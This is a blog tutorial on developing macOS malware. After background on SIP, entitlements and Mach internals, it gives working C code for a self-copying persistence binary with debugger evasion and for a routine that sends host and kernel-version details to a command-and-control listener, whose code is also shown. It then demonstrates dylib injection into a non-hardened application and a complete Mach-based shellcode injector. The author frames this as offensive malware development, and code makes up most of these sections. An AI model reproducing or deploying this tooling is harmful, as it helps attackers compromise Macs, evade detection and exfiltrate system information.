MacOS Malware Development: 0x01

In today’s post, We’ll explore the process of designing and developing malware for macOS, We’ll use a classic approach to understanding Apple’s internals. To follow along, you should have a basic understanding of exploitation, as well as knowledge of C and Python programming, and some familiarity with low-level assembly language. While the topics may be advanced, I’ll do my best to present them smoothly.

First, a quick note: This article was originally written in late 2022 and tested on an older version of macOS. I kind of forgot about it until later this year when I revisited it. Before publishing, I decided to test the techniques on macOS 10.15 and 12+.

The goal of this article is to provide an introduction to certain techniques and offer an overview of macOS architecture, encouraging further research rather than just delivering a ‘for educational purposes only’ piece. I still plan to work on that eventually, but don’t hold me to it just yet.

Alright, let’s move on.

Let’s start by understanding the macOS architecture and its security features. Next, we’ll take a look into the internals, covering key elements like the Mach API and the kernel, and we’ll walk through some basic system calls and easy to understand. After that, we’ll introduce a dummy malware sample. Later, we’ll explore code injection techniques and how they’re used in malware. To wrap up, we’ll demonstrate a basic implementation of shellcode injection. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

Background

a little background from the internet, The Mac OS X kernel (xnu) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a potent abstraction—Mach message-based interprocess communication (IPC) with several cooperating servers to constitute the core of an operating system. Responsible for managing separate tasks within their own address spaces and comprising multiple threads, the Mach microkernel also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel.

Osx

Before we start talking about development, it’s important to understand the basics of the OS. We’ll mainly look at its security features, with a special focus on System Integrity Protection (SIP).

SIP is a key security feature that helps protect important system files, directories, and processes from being changed or tampered with by apps. It restricts write access to these protected areas, even if the process has root privileges, to prevent unauthorized modifications. SIP also adds extra security for system extensions and kernel drivers. For example, kernel extensions must be signed by Apple or by developers with a valid Developer ID. This strict requirement makes sure that only trusted extensions can load into the kernel, enhancing the system’s overall security.

As we can see, SIP (System Integrity Protection) is turned on, indicating that the system is benefiting from its security features. The presence of the “restricted” flag on certain directories highlights SIP’s protection of those specific areas. It’s important to note that SIP’s shielding may not extend to subdirectories within a SIP-protected directory.

To overcome this limitation, Firmlinks come into play. These allow certain directories to be “firmlinked,” which are special symbolic links protected by SIP. This ensures their functionality even in SIP-protected locations, enhancing compatibility, Which operate seamlessly, allowing applications and scripts to treat them as regular symbolic links without any special handling. This enables the creation of symbolic links in directories like /usr, /bin, /sbin, and /etc, which were previously inaccessible due to SIP.

By making use of firmlinks, developers and users can address compatibility challenges while still enjoying the security advantages of SIP. It strikes a balance between system protection and accommodating the needs of applications and scripts that rely on symbolic links in macOS. The use of firmlinks allows for access and modification of certain directories, even in traditionally protected locations. For instance, a firmlink can grant write access to /usr/local, providing flexibility for installing and managing software and scripts in that directory.

macOS makes sure applications have the necessary access to function properly while keeping the system secure. This is achieved through entitlements, which are permissions that macOS grants to applications to specify what they can access and do on the system. These permissions are usually defined in the application’s Info.plist file, part of the .app bundle, which contains metadata and configuration details about the application.

On the other hand, plist files on macOS are used to store structured data such as configuration settings, preferences, and metadata. They have a key-value pair structure and can be saved in XML or binary format.

  • Entitlements: Permissions granted to applications, specifying their access to system resources. Sandboxing Settings: Rules that restrict an application’s access to resources.
  • Code Signing Information: Details used to verify the authenticity and integrity of an application.
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>
  • com.apple.security.app-sandbox: Enables sandboxing for the application.
  • com.apple.security.files.user-selected.read-only: Allows read-only access to user-selected files.
  • com.apple.security.network.client: Permission to act as a network client.

Overall, plist files provide a standardized format for storing important information about entitlements, sandboxing, code signing, and more, playing a role in the security and integrity of the macOS ecosystem. There’s more to explore, such as Gatekeeper, Sandboxing, App Bundles, and so on, but these are the most important security mechanisms that matter to us for development. Let’s dig deeper into the internal architecture. You might wonder why it’s important to focus on the internals. Even though I’m not planning to develop a rk or anything that advanced, having a solid understanding of the OS from a developer’s perspective is essential. After all, we’re the ones writing the software.

Mach API’s

Let’s take a quick look at Mach. It was initially designed as a kernel focused on communication and multiprocessing, with the goal of setting up the foundation for various operating systems. Mach used a microkernel architecture, keeping core OS services like file systems, I/O, memory management, and networking separate from the kernel.

The XNU kernel, which stands for “X is not UNIX,” powers Mac OS X. Positioned at the heart of the system, XNU supports Darwin and the rest of the OS X software stack.

XNU is a hybrid operating system, combining the minimalist Mach microkernel’s hardware/IO interface with elements from the FreeBSD kernel and its POSIX-compliant API. This blend can make understanding how programs map to processes in virtual memory on OS X a bit tricky. For instance, the term “thread” might refer to either POSIX API pthreads from BSD or the basic unit of execution within a Mach task. Additionally, there are two different sets of syscalls, mapped to positive numbers (Mach) and negative numbers (BSD).

Mach provides a virtual machine interface that abstracts system hardware—a feature common to many operating systems. Its core kernel is designed to be simple and extensible, featuring an Inter-Process Communication (IPC) mechanism that supports many kernel services. Notably, Mach integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications throughout the OS.

In OS X, the term “tasks” is used instead of “processes.” Tasks are similar to processes in that they encompass all the resources needed to run a program. Technically, Mach calls its processes “tasks,” though the concept of a BSD-style process that includes a Mach task still exists. Resources within a task include:

  • A virtual address space
  • Inter-process communication (IPC) port rights
  • One or more threads

Ports serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Operating solely in kernel space, ports act like P.O. Boxes, albeit with restrictions on message senders. Ports are identified by Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X supports two thread types (Mach and pthread), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel-mode, while pthreads from the BSD realm execute programs in user-mode. (More in this, later)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach System Calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS, By the way, a system call is a function of the kernel invoked by a user space. It can involve tasks like writing to a file descriptor or exiting a program. Typically, these system calls are wrapped by C functions in the standard library.

Baby Steps

If we check out the Mach IPC Interface or the Apple documentation, we’ll find a Mach system call that’s really useful for getting basic information about the host system. I also recommend taking a look at OS Internals, Volume I: User Space

It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);
  • HOST_BASIC_INFO: Returns basic system information.
  • HOST_SCHED_INFO: Provides scheduler-related data.
  • HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

if we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing a code that write a copy of itself to either /usr/bin/ or /Library/.

To achieve this kind of behavior, we need to use task operations because we need to control another process and access system processes. I found specific Mach system calls like pid_for_task(), task_for_pid(), task_name_for_pid(), and mach_task_self(), which allow conversion between Mach task ports and Unix PIDs. However, they essentially bypass the capability model, which means they are restricted on macOS due to UID checks, entitlements, SIP, etc., limiting their use, and are not documented as part of a public API and are privileged, typically accessible only by processes with elevated privileges like root or members of the procview group. This limitation poses a challenge because malware would need elevated privileges or execution on a privileged account to work unless obtained through various means.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. However, if permitted, we would have the port and could essentially do anything we want including what I’m about to explain. Therefore, So for this example we’ll use mach_task_self() as it typically does not require privileges. It retrieves information about the current task, depending on the security policies enforced.

void hide_process() {
  mach_port_t task_self = mach_task_self();
  kern_return_t kr;

  // Less visible to debuggers and handlers.
  kr = task_set_exception_ports(
    task_self, 
    EXC_MASK_ALL, 
    MACH_PORT_NULL, 
    EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, 
    THREAD_STATE_NONE 
  );

  if (kr != KERN_SUCCESS) {
    exit(EXIT_FAILURE);
  }

  printf("Process is now hidden.\n");

}

the function obtains the task port for the current process using mach_task_self(), which essentially retrieves a send right to a task port. In the Mach kernel, a task port represents a task, and sending a message to this port enables actions to be performed on the corresponding task.

Next, to set the exception ports to disable debuggers and other forms of external monitoring. This is achieved through the task_set_exception_ports() function call. and any received messages should be directed to a null Mach port. The process then exits with a failure status.

int main(int argc, char *argv[]) {
    struct passwd *pw = getpwuid(getuid());
    const char *home_dir = pw->pw_dir;

    char home_file_path[PATH_MAX_LENGTH];
    snprintf(home_file_path, sizeof(home_file_path), "%s/.%s", home_dir, FILE_NAME);

    if (geteuid() == 0) {
        const char *system_file_path = "/usr/local/bin/" FILE_NAME;
        if (access(system_file_path, F_OK) != 0) {
            copy_file(argv[0], system_file_path);
        }
    } else {
        if (access(home_file_path, F_OK) != 0) {
            copy_file(argv[0], home_file_path);
            greet_user();
        }
    }

    // hide_process(); /* For show */
    // remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: It first checks if it has root privileges by calling geteuid(). If it does, it attempts to copy itself to /usr/bin/, and if successful, it executes the copied binary. If it doesn’t have root privileges, it attempts to copy itself to ~/Library/ (the user's home directory). If successful, it prints "Hello, World!". After copying itself it calls hide_process(). Finally, it removes the original binary.

This demonstrates a basic technique used by malware to hide itself on a system by copying itself to a system directory (/usr/bin/) or the user’s home directory (~/Library/) and then attempting to hide its process from detection.

This is far from being a malicious code, but it does provide us with valuable insights into working with the Mach API and conducting low-level system operations. Through this example, we’ve gained familiarity with essential concepts such as process management and communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put a our little program into a debugger, and as you can see specially in the disassembly part there’s instructions correspond to our operation like /usr/bin/ also you can notice the cleanup operations are performed, such as deallocating port and exiting the program.

The Naive Way

After infecting a new host, let’s ensure our malware notifies us of its presence by sending information about the host. Although this method might seem amateurish, a malware shouldn’t connect to a Command & Control server (C2) initially - since we’re just exploring macOS as a new territory, it’s a starting point. We collect system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, etc…, and then send this information to the C2. For retrieving or modifying information about the system and environment, we can make use of Developer Apple - sysctlbyname. This function enables us to retrieve specific system information, such as the cache line size, directly from the system kernel.

However, when it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(), relying on these interfaces as discussed before. To fetch the hardware model, we would replace "hw.cachelinesize" with "hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its hardware model. Now, you may wonder why we don’t just use the first example you introduced. Well, it’s simple. This is to showcase how we access user-related data through standard POSIX interfaces. However, if you want to introduce the hardware model in the above example, just

count = sizeof(model); kr = sysctlbyname("hw.model", model, &count, NULL, 0); EXIT_ON_MACH_ERROR("sysctl hw.model", 1);

we also wanna send some information like kernel version, for possible known vulnerabilities, to escalate, So here’s an example, we use the same function as to get hardware model

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
	send_data(sockfd, "\nKernel Version: ");
	send_data(sockfd, kernel_version);

Now let’s dump and send more information about the profile of the infected host, including details such as System Name, Architecture, Login shell, Home directory and any other relevant data that could aid in further exploiting or maintaining access to the compromised system, W’ll use function such as uname, getpwuid, and getgrgid, Let’s take a look at the code,

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname( & sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);
}

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting to Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Even so, deploying a dummy malware can give attackers a lot of useful information that could be used for future, more targeted attacks or for exploiting vulnerabilities in both the kernel and user space. Such malware can be multi-staged to maintain stealth and keep a low profile. For example, the initial stage might involve spreading the malware throughout the system and lying in wait for the next stage to activate. These sophisticated attacks are advanced and tough to detect, especially on platforms like macOS, where malware can stay hidden for years.

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also simple, designed solely for handling incoming connections. It won’t have any protection mechanisms to hide itself from the system where it’s running, but this server is basic for demonstration purposes only. I recommend implementing encryption, setting up a database to organize data, and generating a temporary ID to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection (which is the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections,

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there’s a security mechanism in place. Why, you may ask? Well, the behavior exhibited here screams malware from establishing a connection to sending system information and continuously receiving and executing commands from a remote server. The network traffic pattern alone is a red flag. Plus, the transmission of system information(User, OS version, Architecture, Installed App, …) immediately after connection establishment, and the good news is that most Mac users assume they’re safe by default, so they don’t entertain the idea that capable malware could go unnoticed.

This is just a tip and a simple overview of how dummy malware can serve as a learning tool before serving the actual malware.

Code Injection

Actually, exploring Code Injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. So, Let’s begin by introducing the first technique, which involves leveraging environment variables or DYLD_INSERT_LIBRARIES for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows users to preload dynamic libraries into applications, Both developers and attackers can inject code into running processes without modifying the original executable file is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into legitimate application, As we gone see, It’s basically a colon separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.

In simple term’s, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application, So for example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see we have a function foo() that prints to let us know that we successful injected a library and a system command that execute a shell to echo basically the same thing and that attribute((constructor)) marks the function run before the application’s main function, into which we injected the dylib, piece of cake right, But how do we know identify binaries vulnerable to environment variable injection, on that later, but first let’s just try it on one of our previous program, So just compile that code like any other program and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

et voilà, When affected, what happens is that it loads any dylibs specified in this variable before the program loads, essentially injecting a dylib into the application. This could potentially lead to privilege escalation, right? Not so fast on the Apple platform binaries. As of macOS 10.14, third-party developers can opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique.

So, basically, we can still perform injection when the application is not defined as having a “Hardened Runtime” and therefore allows the injection of dylibs using the environment variable. Alternatively, when the binary is using a hardened runtime and the developer released it with the appropriate entitlements, let’s go over this one more time:

  • The “Disable-library-validation” entitlement allows any dylib to run on the binary even without checking who signed the file and the library. This permission usually exists in programs that allow community-written plugins.
  • The com.apple.security.cs.allow-dyld-environment-variables entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright on possible target application, For example to run this on Safari.app It won’t work, because is hardened and lacks the matching entitlement,

But that doesn’t mean the application isn’t hardened, as there are other Hardened Runtime features that might not be visible in the entitlements. To speed things up, I found that the version of Veracrypt I have doesn’t use Hardened Runtime, so I’ll use it as an example throughout this article! Now, let’s try injecting it, but first…

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print ‘foo’ and log a message using the syslog() function, which logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program. Let’s try it. If we see the following output, it seems that we’ve successfully loaded the library:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14.

To address this issue, I came across a piece of code called inject.c. Additionally, I highly recommend reading the “Mac Hacker’s Handbook” as it provides invaluable insights and includes great examples of interprocess code injection.

From my understanding, the transition from Mach thread APIs to pthread APIs in macOS, particularly concerning the initialization of thread structures, presents challenges. However, the discovery of the _pthread_create_from_mach_thread function provides a viable alternative for initializing pthread structures from bare Mach threads. This ensures compatibility and proper functioning of threaded applications across different macOS versions.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2

Alright, let’s discuss the second technique. It’s similar to methods used on Windows, and one common approach is process injection, which is the ability for one process to execute code in a different process. In Windows, this is often utilized to evade detection by antivirus software, for example, through a technique known as DLL hijacking. This allows malicious code to masquerade as part of a different executable. In macOS, this technique can have significantly more impact due to the differences in permissions between applications.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group, and flags that determine which users are allowed to read, write, or execute that file. Two processes running as the same user have the same permissions; it is assumed there is no security boundary between them. Users are considered security boundaries; processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was essentially the same security model as macOS until the introduction of .. yep, SIP (System Integrity Protection)

OS X Shellcode Injection

Alright, so we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. But before we proceed, let’s write a simple shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you just need to understand the macOS executable file format, known as Mach-O. However, for simplicity, we’ll stick with the x86_64 architecture and we can later use a linker for Mach-O executables.

A simple “Hello World” program starts by declaring two sections: .data and .text. The .data section is used for storing initialized data, while the .text section contains executable code. Then we define the _main function as the entry point of the program, followed by a reference point in the code, which we’ll call trick. The trick section will be followed by a call instruction that invokes the continue subroutine and pops the address of the string ‘Hello World!’. Also, if you notice in the code, we have a system call at the end that exits our program. The first syscall is for writing data.

section .data
section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0, 0

Alright, it’s time to compile. I typically use NASM for assembling my code. Remember what I mentioned about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we’ll need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to actually turn it into machine code that we can use for injection, it needs to be converted into a hexadecimal representation. This representation consists of a small series of bytes that represent executable machine-language code. It essentially represents the exact sequence of instructions that the processor will execute. For this, we can utilize objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`

If, for some reason, you can’t extract the shellcode solely relying on objdump, you can always script kiddy a simple py, to parse the assembly output;

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    
    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)
    
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To ensure its functionality, we should test whether we can perform a simple injection. One way to do this is by compiling the shellcode and storing it as a global variable within the executable’s __TEXT,__text section. We can achieve this by declaring the shellcode as a variable within the code itself. Here’s a simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =  "
\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01
\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05
\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00
\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c
\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

Alright, now that we have the shellcode, let’s start writing the actual injector. The main function seems like the natural starting point. The logic is simple: we take a single command-line argument, which should be the process ID (PID) of the target process to inject the shellcode into. Then, we obtain a handle to our task using task_for_pid(). Next, we’ll allocate a memory buffer in the remote task with mach_vm_allocate(). After that, we’ll write our shellcode to the remote buffer with mach_vm_write(). We’ll modify the memory permissions of the remote buffer with mach_vm_protect(). Then, we’ll update the remote thread context to point to the start of the shellcode with thread_create_running(). Finally, we’ll run our shellcode, which will print “Hello World”.

Remember our earlier discussion about the differences between a Mach task thread and a BSD pthread, and the task_for_pid() API call. In order to develop a utility that utilizes task_for_pid()

Note: not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU. This is a crucial aspect of memory protection and security in modern operating systems.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected malicious code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.

Alright, the entry point we converts the PID provided as a string to an integer and calls the inject_shellcode function to inject the shellcode into the target process using the provided PID,

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate. This ensures that we have a place to execute our code, Once memory is allocated, we write our shellcode into the allocated memory space of the target process using mach_vm_write. This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %s\n", mach_error_string(kr));
        return -1;
    }
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %s\n", mach_error_string(kr));
        return -1;
    }

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %s\n", mach_error_string(kr));
        return -1;
    }

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    printf("Shellcode injected successfully!\n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;
}

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s it! The entire process of injecting shellcode into a target process on macOS using Mach APIs.

